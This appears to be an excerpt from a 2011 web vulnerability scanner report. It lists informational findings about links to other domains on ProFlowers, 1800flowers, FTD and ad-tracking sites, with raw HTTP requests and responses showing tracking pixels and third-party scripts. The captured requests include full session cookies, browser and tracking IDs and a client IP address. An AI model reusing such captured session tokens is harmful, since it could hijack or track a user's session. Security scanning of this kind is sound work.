Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_common_old.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_PartnerHeader_UCHeaderPFC__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/Default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a rel="nofollow" class="radioLogo" href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home" style="display:inline-block;height:90px;width:160px;"><img class="radio_icon" height="90px" width="160px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
CHeaderPFC_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
&#39;.proflowers.com&#39;, &#39;NTRAccountManagementBanner1&#39;, &#39;NFX&#39;, &#39;:&#39;, &#39;-&#39;, &#39;,&#39;);" href="http://www.netflix.com/?mqso=80026223&amp;trckid=PFAM1" target="_blank"><img id="ctl00_bannerbodycreative" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/NTR_AcctMgt_PFC_712_100.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /> </div>
...[SNIP]...
lInput" type="text" value="Enter Your Email Here" id="ctl01_ctl02_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a>
...[SNIP]...
and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a>
...[SNIP]...
t, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
16.5. http://adsfac.us/pct_mx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pct_mx.asp?L=305608&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 542
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 01:00:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Product" width=1 height=1 alt="">
<IMG id="fd_pct_image1" name="fd_pct_image1" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...
16.6. http://adsfac.us/pct_mx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pct_mx.asp?L=305609&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 393
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 01:01:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...
16.7. http://adsfac.us/pct_mx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pct_mx.asp?L=305606&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1475
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://ad.trafficmp.com/a/bpix?adv=1657&id=1&r=" width=1 height=1 alt="">
<IMG id="fd_pct_image1" name="fd_pct_image1" src="http://bp.specificclick.net?pixid=99016158" width=1 height=1 alt="">
<IMG id="fd_pct_image2" name="fd_pct_image2" src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215" width=1 height=1 alt="">
<IMG id="fd_pct_image3" name="fd_pct_image3" src="http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome" width=1 height=1 alt="">
<IMG id="fd_pct_image4" name="fd_pct_image4" src="http://at.amgdgt.com/ads/?t=pp&px=13078&rnd=[cachebuster]" width=1 height=1 alt="">
<IMG id="fd_pct_image5" name="fd_pct_image5" src="http://view.atdmt.com/action/MMN_1800Flowers_Welcome" width=1 height=1 alt="">
<IMG id="fd_pct_image6" name="fd_pct_image6" src="http://ads.bluelithium.com/pixel?id=1079972&t=2" width=1 height=1 alt="">
<IMG id="fd_pct_image7" name="fd_pct_image7" src="http://att.adpxpx.com/pixel.php?id=181" width=1 height=1 alt="">
<IMG id="fd_pct_image8" name="fd_pct_image8" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...
16.8. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99016158 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7hMF^3^15; smdmp=7hMF:1012201040^7hMF:104201101^7hMF:811200901^7e-J:811200901; adf=7hMF^0^0; ug=wJ6hSWn821G3dA

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=7rMsCIfRlAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 270
Date: Mon, 09 May 2011 01:01:04 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/?label=7rMsCIfRlAIQt6DI6wM&amp;amp;guid=ON&amp;amp;script=0">here</a>
...[SNIP]...
16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...
Of('sitrackingid') > 0){
}else{
if( si_pageurl.indexOf('sisearchengine') > 0){
}else{
};
};
}
DeliverThirdPartyPixels();
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="https://fls.doubleclick.net/activityi;src=1667271;type=jan20557;cat=ftdse646;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Future.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
